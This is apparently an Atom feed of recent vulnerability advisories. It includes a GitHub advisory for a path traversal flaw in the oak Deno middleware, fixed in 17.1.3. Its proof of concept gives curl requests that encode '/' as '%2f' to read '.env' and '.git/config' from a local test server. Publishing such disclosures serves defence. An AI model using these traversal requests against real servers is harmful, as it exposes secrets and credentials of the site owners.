<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-06T21:40:38.546561+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-198920</id>
    <title>EUVD-2026-198920</title>
    <updated>2026-10-06T21:40:38.548662+00:00</updated>
    <content>EUVD-2026-198920</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-198920"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2024-49770</id>
    <title>fkie_cve-2024-49770</title>
    <updated>2026-10-06T21:40:38.548694+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>`oak` is a middleware framework for Deno's native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. By default `oak` does not allow transferring of hidden files with `Context.send` API. However, prior to version 17.1.3, this can be bypassed by encoding `/` as its URL encoded form `%2F`. For an attacker this has potential to read sensitive user data or to gain access to server secrets. Version 17.1.3 fixes the issue.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2024-49770"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-qm92-93fv-vh7m</id>
    <title>GHSA-qm92-93fv-vh7m — Path traversal in oak allows transfer of hidden files within the served root directory</title>
    <updated>2026-10-06T21:40:38.548728+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: @oakserver/oak</p>
<p>### Summary</p>
<p>By default `oak` does not allow transferring of hidden files with `Context.send` API. However, this can be bypassed by
encoding `/` as its URL encoded form `%2F`.</p>
<p>### Details</p>
<p>1.) Oak uses [decodeComponent](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L182C10-L182C25) which seems to be unexpected. This is also the reason why it is not possible to access a file that
contains URL encoded characters unless the client URL encodes it first.</p>
<p>2.) The function [isHidden](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L117-L125) is flawed since it only checks if the first subpath is hidden, allowing secrets to be read from `subdir/.env`.</p>
<p>### PoC</p>
<p>```ts
// server.ts</p>
<p>import { Application } from "jsr:@oak/oak@17.1.2";</p>
<p>const app = new Application();</p>
<p>app.use(async (context, next) =&gt; {
  try {
    await context.send({
      root: './root',
      hidden: false, // default
    });
  } catch {
    await next();
  }
});</p>
<p>await app.listen({ port: 8000 });
```</p>
<p>In terminal:</p>
<p>```bash
# setup root directory
mkdir root/.git
echo SECRET_KEY=oops &gt; root/.env
echo oops &gt;  root/.git/config</p>
<p># start server
deno run -A server.ts</p>
<p># in another terminal
curl -D- http://127.0.0.1:8000/poc%2f../.env
curl -D- http://127.0.0.1:8000/poc%2f../.git/config
```</p>
<p>### Impact</p>
<p>For an attacker this has potential to read sensitive user data or to gain access to server secrets.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-qm92-93fv-vh7m"/>
  </entry>
</feed>
